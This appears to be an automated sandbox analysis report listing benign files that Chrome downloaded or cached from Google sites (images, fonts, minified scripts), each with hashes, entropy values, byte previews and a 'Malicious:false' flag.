                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...4...0.....^.Y.....sBIT....|.d.....IDATh...{pT...?......6!.._R.......B...U..E.......X*4..R.T......S..J.R...T.8RJ..(....!...? .M.f.n..........=...[ O.w.R|.......h...\...+..WY~..D.-....{..4...cHm.v+.......>z.4...l......H..k2...;.......%...K..[....5)f ...S..)..kn........~.j...uw..1e.U......BU.R.#V.,..K.kP..>_.....%?..ji.yJ...bE.\.^.6..o.q......>.bc.l.Vjyy...#....)]:M)u .zV0.....^.9.o.^..."....tZ...X....~..;.$........L...W........o.V....+..9..(.....6?.U.d.eku..,.Znz.<..iJq[....03s..g.....p3.j...SM.....0...m..8...3........?...wS..l..^.Z...].d.0>!N-.g...q'...*b.{V..k*A......N.........iIuF...cyyvd..-...G.j...]...l...o.. S........R...U4.....*.o...t.m...>.-....{.......4...s.3..@yJ........g.\.F....eN.....j..../e:I...F.kPM.N(.n<.....V.5.Z....`.F....m...(....5...&.y..C6]...3...H).fu.u..f...:......).J.MF..S....u.(0...[?.,.$......<v...f....;...z2../Zk..Gyr.y{..N..h...d.02e.o.-.ze..k..a"..1.H[..6]....h....C.f...T(........_. ..g.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1224)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1514
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.27479625067495
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:xlJkpD73UAKkiB/+Gyi/6HbzkS6iq/5XZC5S4QhTE4RuRZwt/9Sp/A/ASJ:6khko5yi6zPG/a5jYHtlSp/A/ASJ
                                                                                                                                                                                                                                                                                          MD5:26F8B3C27C55272C775E579F80E837EA
                                                                                                                                                                                                                                                                                          SHA1:15986AAF8F8E37C933C9C707837C340A5882CE4F
                                                                                                                                                                                                                                                                                          SHA-256:DAED081E0609DFDCD09174CC8C89BB5CEBF670A7600D9C0C168BCA3E63016F1D
                                                                                                                                                                                                                                                                                          SHA-512:70A2F351C98832889BD4A8DD01EE6D233D17273398E0D88BBBA16D78F867C28D8B9F6A7A48A87C6F9E19738F20654ACC53930200F8644F47222C88253867DAFE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:import{r as p,s as d,x as c}from"./ycaG4YXp.min.js";import{e as u}from"./0XPwTFcg.min.js";import{n as f}from"./IYoTYjYE.min.js";import{t as h}from"./ianzD0dL.min.js";import{i as b}from"./IFunn9hk.min.js";const g=":host{display:flex;height:auto;scroll-snap-align:var(--bds-carousel-scroll-snap-align);scroll-snap-type:x mandatory}.container{box-sizing:border-box;width:var(--bds-carousel-slide-width)}";var v=Object.defineProperty,m=Object.getOwnPropertyDescriptor,a=(e,s,t,o)=>{for(var i=o>1?void 0:o?m(s,t):s,l=e.length-1,n;l>=0;l--)(n=e[l])&&(i=(o?n(s,t,i):n(i))||i);return o&&i&&v(s,t,i),i};let r=class extends d{constructor(){super(...arguments),this.role="listitem",this._width=0,this._height=0}get width(){return this.container?.offsetWidth}get height(){return this.container?.offsetHeight}attributeChangedCallback(e,s,t){if(super.attributeChangedCallback(e,s,t),e==="visible"){const o=t==="";this.updateVideoStates(o)}}updateVideoStates(e){this.querySelectorAll("video").forEach(t=>{e?t.play()
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, original size modulo 2^32 15071
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4713
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.951283256676123
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:YaLY0x7bFU4aXDQ1giFdlgDJGKTXffkiNqYT871IpHvBx8QdsB:YaUgKxXU1giFdleYCv0f2vUQ6B
                                                                                                                                                                                                                                                                                          MD5:C368BE0062D64DA9636D9D8652DFF7C7
                                                                                                                                                                                                                                                                                          SHA1:EDDF5F91683C626D474A8C1F582E04AC9A1890AD
                                                                                                                                                                                                                                                                                          SHA-256:67A9DE65373797213F6E0CBE22B07520385D1B8F3CB7B98A9DBBDEA18B862B16
                                                                                                                                                                                                                                                                                          SHA-512:22ABB8487EA4013DA9FD336B11DA08DA327E68CD828AA65C80D9854903A3BCE426C4527DCAA78706628A8880BE986434A18C63FEA0ED3884F7A1553D2DA260BD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...........Ko.F.....v...H.]. ...an.Y...%A...~..jR...9....d.cv....U..b....>..].?^-....?|xzzJ..d.....4.......]....A.W......q.Y....p..W...7.|.J.4.9.......Co\...*xL\..m\G.....1i.:..g..M.`...[./......\.s.D>m.8.h..Vsy.w.[....o..~?.7....'>.\........6xiw.r...bh9.1..'y.FEV.J...G..KK.v..S.e6...J..W......1..W.a...>=......6....vh.....K...G.t..V8..U@....<n.e...h....l....T..........n...~..PX4......(.Xc.v.1..7..<..#..V....\:.T.El?G.....m...vHN8........S....ik0...... .......J.U...j.M..q......k..>?..*.<.K...'i.WI..I...#.%y...M.s..BY....(....96.%WQ.\.....r.dU.d..yR[a.o.X#....>R=....>..V5q..q.G.y.x..QR..HSI.."F.....X?.q...KWC.q&".q....^...8....6>.v.&...s.%k..<.}O......T.D~."G.#..=.8A...?..I...V.E........%........5Q6...ptb.......t.v.t...A...,NJVK...&........b#;...n..........%.S,.u...i.........K ...e__ c2#.T...{.,#w.v.KE....B...d.A.`j.|..pR^....A.h.Z^...,YP.5...q..).^.A..._...v..W.x.x...x.q1-...!.I..q..bY....oE...:...<.0.Q8M......i.By.Rr..Nf.._V...f=..`.S .)......c&...C.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 700x395, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):61467
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.979687428130604
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:QQv0FbEZ9G35SZxh9IBHQAjQfv5FtFZGX:Q00t5SHIeFFG
                                                                                                                                                                                                                                                                                          MD5:F7D18CBC610C26ECED9C03C38D306E80
                                                                                                                                                                                                                                                                                          SHA1:88A64EF0F026734C661CAF70D6A2DDA9663AC560
                                                                                                                                                                                                                                                                                          SHA-256:C842822C5366C8F3A094CDA95092F1DA3CAE3D72673A46FE5826277757B7A8D3
                                                                                                                                                                                                                                                                                          SHA-512:6EBC14FB37383CEB33078D27A23C350A311B6CA25D91B2EF3ACC3955575578A412D93ABD5BA67FFAE660B93A7DB44B3C17649FAF2DA40B5A15A980CF99951308
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/f7/e9/dae1da6e4d4ab032557aca9f7a86/bay-area-ecology-map-hero-01.webp=w700
                                                                                                                                                                                                                                                                                          Preview:......JFIF...........................................................................................................................................................".........................................Z..........................!..1Q.."2Aq.#Rar........3B.....$STb.....Ccs...4t....D..%U.....................................D.......................!1.AQ...2aq..."3R....B..#br.4..$D....S...%C............?....Y.4).Y. ..............EeH...{}t........j.......(..M*B...Q..@...4...4E,.cJ.L{....P..".[?9.._.......C..g.Wq..v>.U.Wee......Y..I{......K..)..&9.=....5.?..b..U......P.4T..R...sY.@P.....)...Q....{.o..j.o.V%i.4..{{b.......m,..(\.Q.sX............e.......Z....._oM }...h..onTi.Cw........41@...Yo...).P%\-...|~....L:...c...?..>.*Sl6D>....i._....M...f..3....\.j..f.n../.~oq.,..../2;.b..=..5..I<.i.j}J:+....G.y/..~h..=5...c.wHF3.R{O.|.F>.mA.M.....>y....cf0.......Qc.V.%.L:.....n....x-..=..k..,.v..w..>..h#.....k..Q.O.B......4.`....DP&.......:T.... im.H.&.*+@.4.D....(..).4.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 700 x 495, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):265335
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9557490655143965
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:XlMnLVGTYBBiPmfpx934HbpBTLHVr6K9Zy:XqLY8vYS34NBTMuY
                                                                                                                                                                                                                                                                                          MD5:F80AB9EBB64AF377C7F3E6109D4FDBC7
                                                                                                                                                                                                                                                                                          SHA1:9072DA126CAD59C0C96108E0853655E550A9A7B2
                                                                                                                                                                                                                                                                                          SHA-256:D0D1010DF5BAD1984249F2C1AC0D3231AC82541276A70D015BE5C0A94DDD557D
                                                                                                                                                                                                                                                                                          SHA-512:6D333899A5868CE83260E004C720E5ABFD91ACED2161869F266BA8A44944287827419EBA7AF86AC8E9E0B0BDD23ECB8482EACC02C0E52EFDE920CAA6AE5CCD91
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/23/e8/dc7bd9d743beb2edaad747e2cfbf/8vzpx5jpexvcztx.png=w700
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............9*.....9iCCPicc..H..W.XS...[......H..."R.H....^..!..J.. bG..\.X....(v@.E.....e],.Py....+..;......;s....Oq..lT...Q.$&.1.).A.........qyybVTT8.e..{y.. ....L....h..y<..(.S.y......W..|..2.|j.X.a.... ..e8].+e8U...m.b..7..B.r%...].<....5.z!v..".........!N....!..3S..I..f.&..>..s....a.8.;..L...9..A.V.R3$!1.9......a*.=..H.. .(...!F)..x.=j..c..]....0..!..eG.+..4a..b.B.Ba>'.b=.....c.6.%.1J_h]...R....._..G.x.R.M......2..!.@lQ L..X.b...0....v..D.#......(._....I.b...9y...6g.9.J| ?#.D........]..X.:..q.s.....s....X..Gq...b,N.gG).q3Av..7..%. V9.O..R.......q.E...(E<.2... .0...T..2.......)z...H@:...%38"Q.#..XP...H.....{...._.X.....{..#..3.s@...R.(.....2..x....f.*.... ..aA&\.H.=2..-....b.1.h...>.....~.:.L.cp......m....v....b.OQ...P?H....s.[AMW.....P..........p_....le..0~....~x.J;...%.#..m~..f..:."....Q.:.o.P....?d....-...A.<v........;.5`-.q..Z]O.k.[.<.,.#....'+.d.S.S...E_..P....\.4.0=#..._...#.9.`8;9.. ..(^_o....D..;7....O........`.;..G.s6L
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3371
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.886614052822181
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:a2kvgA2m5ed9WT7AZWuiOh9wZu+BbP+/0b+EWoAQc0Ke7/:cimhAYuiEngznnJ/
                                                                                                                                                                                                                                                                                          MD5:FCC6A5A590F8A56FE298D45CFC875ED5
                                                                                                                                                                                                                                                                                          SHA1:B1CE3FE1F22648F519C54127FA472A1F1FE6D08C
                                                                                                                                                                                                                                                                                          SHA-256:477BA241EC4BD3F78A83B8045AC219E9B304075D26A739C41B62F5E429136503
                                                                                                                                                                                                                                                                                          SHA-512:C697AEE0299352FAC08926EE83BFCB4DED2AF5FA976919454996A8E985D5C30DB369EAE67EB8542AA77F2D25DC3DAC88C0361387A197FCF49AF2FFDBFBF580F2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..{..U..?.....3.d&..!..[K..(......u....,-w4..V.(f.....H.H.&.nF..H.P....e.`+..IH...y...g....}.1L.s....C.*.jR......._..............................=..n>z.n....-.^X.s...C.<.Hv..W..S/...[.....4.V../._...n....n.ab..l..B.1L........T.S...}|....e...`.v>..............k^.`...I....d.............1SG.Mm7......sG.7l&U.[.3....&.{|.U)N+..^.._.].77D.ugRd.e;...`%p..>7v....0...Mm.v.u..^)n(..H.g.e;)...=...SB.....#......4..B.N..`.v.._.......-..U)..37......W..k.e;.....`..n.0.-..%...7/Y{..`...4..K...W.!]F...n9............SN.4....|......W..\.../o...W...i.^.e;..f....Zb...}B.b...dS.[/?....R.EC.i...!..K..%yb..1.(J".....\..u..!.._.-.Y....VH.m.Rn.-./.z.....K....i.-.Y.l......R\......v|Q.....K.e;&p.p-.fm...1b........+7.M*......l..[.........U.T..M.s....:...|.D..m......`n.T....._x..."..G"..).O.....3..P.#.|.Le...6.....M.....lg..,..B4.....s.........,.~.l...l..;.;.5:u....2......;/Z.|`. ...`.v........aS..^Q..mY..?Ml.s..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (593)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1670
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.336764995547798
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Byp1JLMeOeyH3w6G0SjE30rxaCMGbQoUGbsQP3h:ByNMeOeyXw6lSjZrxabooQJ
                                                                                                                                                                                                                                                                                          MD5:DC1D542C406F52529E16AF1FE3247B98
                                                                                                                                                                                                                                                                                          SHA1:A3839F0CA57DDCB9376319DCD104BC6F7CFD8B71
                                                                                                                                                                                                                                                                                          SHA-256:87DFCBC47FE34ADDEECC61DF346C8D84FFBA4602FDAEF81846332053F1497723
                                                                                                                                                                                                                                                                                          SHA-512:2F3B8083CDF6B496B89726025F9F63E7871759C8A5F0399FB758D934EE7F645212747F50218F5178455A54A7956E113598E98C2B6376C310E57DD8568758FBD7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:this._s=this._s||{};(function(_){var window=this;.try{._.x("lOO0Vd");._.Neb=new _.Md(_.iOa);._.y();.}catch(e){_._DumpException(e)}.try{.var Xeb;_.Yeb=function(a,b,c,d,e){this.qvb=a;this.y3f=b;this.LBc=c;this.Zbg=d;this.Lyg=e;this.Flc=0;this.KBc=Xeb(this)};Xeb=function(a){return Math.random()*Math.min(a.y3f*Math.pow(a.LBc,a.Flc),a.Zbg)};_.Yeb.prototype.mMd=function(){return this.Flc};_.Yeb.prototype.B_a=function(a){return this.Flc>=this.qvb?!1:a!=null?!!this.Lyg[a]:!0};_.Zeb=function(a){if(!a.B_a())throw Error("Be`"+a.qvb);++a.Flc;a.KBc=Xeb(a)};.}catch(e){_._DumpException(e)}.try{._.x("P6sQOc");.var $eb=function(a){var b={};_.Pa(a.QNc(),function(e){b[e]=!0});var c=a.jMc(),d=a.JMc();return new _.Yeb(a.IMc(),c.oa()*1E3,a.Txc(),d.oa()*1E3,b)},afb=!!(_.Hg[33]>>29&1);var bfb=function(a){_.On.call(this,a.Ka);this.logger=null;this.oa=a.service.N3c;this.Ba=a.service.metadata;a=a.service.CNf;this.fetch=a.fetch.bind(a)};_.F(bfb,_.On);bfb.Ha=function(){return{service:{N3c:_.Seb,metadata:_.Neb,CNf:
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 21428, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):21428
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.98902982301693
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:Ga2PJr/Lbhbzz4UzqkvYtAXFsBry2xzz1kdta3OX01k+M5o2Fw4eMeQokBl1ypzv:Ga2Br/L1DVzq6XFozz18teOX01/pYtN+
                                                                                                                                                                                                                                                                                          MD5:965BBFEA8A5DB5AEA3A63DA8C5B3D570
                                                                                                                                                                                                                                                                                          SHA1:CE645F4ADF18C4FF26251610878969C9562DE69F
                                                                                                                                                                                                                                                                                          SHA-256:92A7F8224A1BA2CCFA92D3E1FC55EE5AA7AE20A0FCD80D3331BD660878A090F5
                                                                                                                                                                                                                                                                                          SHA-512:17BDB764F190F97907462B8D0526474E0BA903A07A3FA3E71968115CC5E2D9E1629979398C6B6E664580B8F294D62F855F8BBF5F3FCCCF3A40D90521E15B186E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesansdisplay/v21/ea8IacM9Wef3EJPWRrHjgE4B6CnlZxHVBg3etBD7TA.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......S...........SO.............................b..@.`..~..v..u.....X........6.$.... .....X....p.5.=,...x.^?.#..A.~..8....D...g....R....!...)..R.II......U.?.gZ.\..Z&.J...+V..M,!..-KUj;.....A...J<~Fj.o.D.EN....Q$.p.wGO..s....<An26............7]......D........s.s.....)......DU.....?..../...f..c..........J.......Q |.bT!b'~?F..>...y[.Z...]8|-^1.K.`7.......S5. .v.....?a&.$............t....&..*.h...Z..L.4.7!......M. 6...r6.. ..:../. .8E.T..#......\ .S..).t.:L....s.7g..lI.e..A;....rWR8T=..]K...XZ....y.zf.o{9.E:sO...d.}b9qQ.k.A$.CTQ..........(G.qD*..*"..........u.p..}.*.W.......V........W..z....L..O...U.....S.B."....?..*g.....4g.M..O.j..>..B.C&.....,.#.h^#S...A......_{.......a......Hm.6...7...R.w...y.r.P2.)....*.I.......].....,o.w..3.:@..1..9.rC.b.l.e.r.W.KS_..;.......P......2..`!(:.l.Y.c..\..G.....U.f'.Z..~.(^....'...F./uJ.*j.+..........ev....4.X...V7...k.BZ(.`..Vm..h6&{.D...p........\....5....../.,..-9...C"d....7...._.o...E......r..B.LJ.k)^. ."..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):514
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.481765030174575
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:/EiEsnQchxZkP0nat9NbR08z5fFIu2+aRHC8OvmO36IAe:jQMZkMa/AYf9aRi3EIr
                                                                                                                                                                                                                                                                                          MD5:6B024625FC2D074F623821A04210C1E5
                                                                                                                                                                                                                                                                                          SHA1:36CD79C4FEA20C21D4AF50A80098DC42B4D7F235
                                                                                                                                                                                                                                                                                          SHA-256:C262610200277C07EBCEB28E91C729DE56D5C89D40654E484FA386C1E99BC16F
                                                                                                                                                                                                                                                                                          SHA-512:7AF0A3CEFB527FCCCC3EFDD7AC6028B17D10E35A214072CB2FBB040C05697ABC2B14DBE9DEA7C48A004ED106D22BB223A381FD1E5AC2EE67346DDBC1B96CA6EE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps/vt?pb=!1m5!1m4!1i4!2i1!3i7!4i256!2m3!1e0!2sm!3i707457665!3m17!2sen!3sUS!5e18!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmd8cC5jOiNmNGY0ZjQscy5lOmcuc3xwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b2ZmLHMuZTpsLml8cC52Om9mZixzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy5lOmwudC5zfHAuYzojZjVmNWY1LHMudDoyMXxzLmU6bC50LmZ8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmd8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmwudC5mfHAuYzojNzU3NTc1LHMudDo0MHxzLmU6Z3xwLmM6I2Y1ZjVmNSxzLnQ6NDB8cy5lOmwudC5mfHAuYzojZjRmNGY0LHMudDozfHMuZTpnfHAuYzojZmZmZmZmLHMudDo1MHxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjQ5fHMuZTpnfHAuYzojZTllOWU5LHMudDo0OXxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjUxfHMuZTpsLnQuZnxwLmM6IzYxNjE2MSxzLnQ6NjV8cy5lOmd8cC5jOiNlOWU5ZTkscy50OjY2fHMuZTpnfHAuYzojZWVlZWVlLHMudDo2fHMuZTpnfHAuYzojYmZjZGRiLHMudDo2fHMuZTpsLnQuZnxwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b24!4e0!5m1!1e3!23i47083502&key=AIzaSyBux5gy-wv-c21aQl2an30LCk2KY4M9teI&token=103945
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../..?./..m#.?...}.d..m...'...uV...\..Eo...G...1..(0.rm.j[....Ro......+.>`...H..qj...Fn$9..p.f...`..z`.%......jt..... .w_h.o.Q..#.<...'...m.(...d.yQ.....<p).......Ev&..y9;..Z..UiR..b..T...L.B.%.p.......<..gQ......b.....l'2.u.n.,N...2.9'....B....n.i.|.9......D.E.+...v:...k.7.Sr".wJi...].<V)u....pJ.\D..jPeN... .a.2s^tHA.=..yuS.[.U)...z...:.(.#...6....d..E....K/^<....o.....D..E.<K//@....c...o.|..}|........./ ............../.......o.(=......9D....~?.7..0...o.........\.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2903
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.888216524084566
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:pHINfPgK98OsYmn+X/+FIRY6txiB0/BdHqlVHlYzfLqr0VarAxmXSgjNiHL+hXXT:2NfPguC+XqIFEyBN1fL60VIAxmC8xV
                                                                                                                                                                                                                                                                                          MD5:F860040B596E56056BAE7CAE0C7595F6
                                                                                                                                                                                                                                                                                          SHA1:3730BED10B82E295631F1787FE4046AFD35023EA
                                                                                                                                                                                                                                                                                          SHA-256:A4E761C41E5A6D0B4318419D68DEBE2C57011BEB5DC5C0B8912CF24DEB7BAC7C
                                                                                                                                                                                                                                                                                          SHA-512:31F15BE7533EB1587325A07C9948EFFF26D2607490E5DBE12B80DE6F4ECFE7F299C9BDADAFE574EDF279C14FC8B864AFBAA77C1EF2FACD7886E1F34F1B95A53B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2....IDATx.._l.G..3...c.Mph0U.JH$...O......D.<T..T......T..'*....P..}..T...........Z..KPL..qR'../vr7?....^......H.+.....gfvg.......`0.......c...@.../}....7............v..O.nq....C.;.7G..,H...c..<.M..Re..S.b..+.'t.....Q1{.............y.N..O........+3.T.o..bc..`...m..;W}1.J&@O.Lg....x.k.sP......^5.......s33.T.......=lrO..5.V.7.I...3..4......!....lz.wL......J...@...29...........Q......sm0.9.....sP.7L..t.Pun.O...[X&o..`._..48........8.o.sa...).&..`:y.:w..q.kn....(5.a......?.....~...N.....kn.....K..K.k....8..1l%..".[K.G../.s.....N..........,o,5.az.wq.cxL......>..../..r.'........W..nvs....;.....y.W.....}..e..A@...s`r..^e..-\...u..P.O....3k....~{...~$e."..'...4..\ .{..F.L.........Tj^....P.U.2yx.2.j.L.......{y.W...V.|$c&g.....a..5.cz.~.......l}rVL.........[7py...../..7..Y49u.}...5...B.....0..cx...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2454
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.865198854081698
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:evapvovJJVnBTT8FLBJfiMAMY6rXn1rjiezbCt9d8FHVYWPk:eKONMfzHr1rjpC/d8Fts
                                                                                                                                                                                                                                                                                          MD5:55F9F1247D96300783B5295195557D7C
                                                                                                                                                                                                                                                                                          SHA1:622675DAE7B7E5694E1CF4F88D30AC6C64AE31BA
                                                                                                                                                                                                                                                                                          SHA-256:966D743553AEEA310502D58909BF40F6B8C795FBE5E5F3A528EF5C7E4E58AEB4
                                                                                                                                                                                                                                                                                          SHA-512:3FFBA77234E866DFDA62FC7EF4B3DB96D3DDFF2384CC7801ADBF2584CF9C36205FF8A4E851FC21E1215C02B3B466609B766BDB505C6C6007394DF23D6118C869
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/kLMr5zuHxfe-IxhnKdLp_1JkP5sl2ova0svHjQkFnV1q8X7yE6uA9p8AToT_L7xL5s5EIayVVVljNtp7BgoL69PtZ-Mf00qUbpTLfrrqXWv99tatmXI=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6....]IDATx..}.Ue...s...w.&k.Y.5....6.E5N`....5}XS9.9Y.iS6c)}....5JI.N............n...!..(.,......^..ew....{.....f9.....}...q.c..&.....x...r....sr......K............}G.{.,..u.........a..XlY.Nk.V2u)%q....7L.....A=0...\.4..n..v`.....r......_rF.h.O.??......].A3.7..H.|...&.\........9..........i.@..*c..j.O.....B.....,3\...H5....u+."..m._..\.w$.T.'.....h..........z*.|..Q..$..w...P^(.D..L....i.y5p.........FM.8.x......E.......".........5..Tp..QM=. ..\.8.@.Tp.....B..........H...D.....`..;.vk..i=......|Gq,.!L.K4.../P..yh....W".\+.....0....dX...1..(..H.?@.oT...DEp.....v.>n......q...O..~../KFU0v.N.}.K....E....Y. .g..?A../*..."-x...K........Z.X>.l..#IYM....W..$w .5..<1yd...yZ....c..D.n...1.x.X..M.<Z.s....>.v...W.....{d..'..2.Zp.L.Z.mC.P....`........?k..s;.X.7...Y....`..q_.2.-.[....<..Y.;Z.?|.9...H...Z......m._.P-..... ..{.........`)r..'h...<.......`...!..W....,..<.4.W.qC-8...^D.pW.,......a......`...T.(<..l..<G...kK...e..Y....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):44
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.5160276412662315
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Ul/ygn1ZrFIEbpD7an:UAi1ZYn
                                                                                                                                                                                                                                                                                          MD5:4597EBF072B6E123705160FD4571A540
                                                                                                                                                                                                                                                                                          SHA1:574D9C3C77230531194DDF955F79B4E0A539E458
                                                                                                                                                                                                                                                                                          SHA-256:48860D4FE9F78C8C9D195830988CD52AB17E71C7C0E623383509F5C966A6BF5F
                                                                                                                                                                                                                                                                                          SHA-512:6E975560962FA57B35F7F8EB0B5666F6D48C97BE69080B02E87DCA7FCC3823BDB5E769652A310DEFE4EAD730145E466B42891F3D0DC248D037ACD835772931DE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF$...WEBPVP8L..../..?.....v....E...".....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2, orientation=upper-left], baseline, precision 8, 1280x809, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):461703
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.97396817090042
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12288:uRpGaDcscJn+3Ja08BqyeqINqoRjPSlSTf:uRpGk1iN7BqyTCslGf
                                                                                                                                                                                                                                                                                          MD5:AF9B1DF42025E527BBAA89BDF2EC3F5D
                                                                                                                                                                                                                                                                                          SHA1:007246D983D06D47E7905BA1E3390E1CDD589B06
                                                                                                                                                                                                                                                                                          SHA-256:A27E60D520F8D871B39F628848751D5955FE315E2DE101356B7F92D8F7FE6C80
                                                                                                                                                                                                                                                                                          SHA-512:5E4714592F4BA4A2804354F4B33912468B157DB322D27B688D00227E2F4C96D51EA34CC30B6B13E7C88A54B0897A79E670B613F3027CBB76F9700A37CEFD7E08
                                                                                                                                                                                                                                                                                          Malicious:false
